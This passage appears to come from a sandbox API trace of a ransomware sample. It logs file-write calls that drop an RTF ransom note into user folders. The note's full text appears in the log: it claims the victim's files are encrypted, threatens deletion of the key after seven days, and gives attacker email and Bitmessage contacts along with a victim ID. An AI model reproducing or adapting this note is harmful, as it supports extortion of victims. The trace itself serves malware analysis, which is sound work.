b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.274] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245d7a8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x04þV\\Á\x1aþ®×\x09ãox21'­_&¶jD\x8dÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0297.275] WriteFile (in: hFile=0x2f4, lpBuffer=0x245d7a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245d7a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.275] CloseHandle (hObject=0x2f4) returned 1 [0297.276] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\#readme_eman#.rtf")) returned 0xffffffff [0297.276] GetLastError () returned 0x2 [0297.276] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\si\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0297.277] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 